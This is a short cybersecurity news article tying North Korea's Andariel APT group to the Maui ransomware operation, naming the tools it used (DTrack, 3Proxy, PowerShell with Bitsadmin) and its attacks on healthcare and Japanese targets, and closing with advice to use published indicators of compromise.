Researchers have linked the North Korean Andariel APT group to the Maui ransomware operation after seeing their activities for financial and espionage campaigns against South Korea.
According to the researchers, the Andariel group used the tricks, techniques, and procedures (TTPs) employed for the Maui ransomware attack. This idea was proven after the recent attack of Andariel overlaps with the previous activity of the ransomware.
The study showed that the operations utilised authentic proxy and tunnelling tools to establish access to the infected target after the initial infection. Moreover, Andariel and Maui used PowerShell scripts with Bitsadmin to download additional threats.
Identical use of exploits was also seen by researchers used by the North Korean hackers to target identified yet unfixed flaws in public services.
Andariel APT focused on launching the Dtrack malware against their victims’ networks.
In Andariel’s recent activity, they focused on deploying the Dtrack malware and remained dormant for months inside a victim’s network before executing any action. Furthermore, the threat actors had launched ransomware worldwide, showing they focused on gaining financial profits.
The FBI also issued several warnings about Maui ransomware and published indications of the involvement of the North Korean threat actors.
Andariel APT also attacked a Japanese entity using DTrack malware before encrypting its data. The log analysts for the attack also revealed the presence and the usage of a 3Proxy kit in the affected firm’s network months before the encryption.
DTrack is a modular malware utilised in HTTP exfiltration and data theft using Windows commands. On the other hand, 3Proxy is an open-source proxy server utility used in several Andariel cybercriminal activities.
Attackers then employ the Maui ransomware to encrypt servers in healthcare services, such as diagnostic services, imaging services, intranet services, and health records.
The Andariel threat group has an affiliation with Maui ransomware. Therefore, individuals should use the authority-provided IoCs since they can significantly aid real-time detection and prevention.
Organisations should use these threat intelligence services to immediately identify TTPs and get advice on the most potent movement against threats.
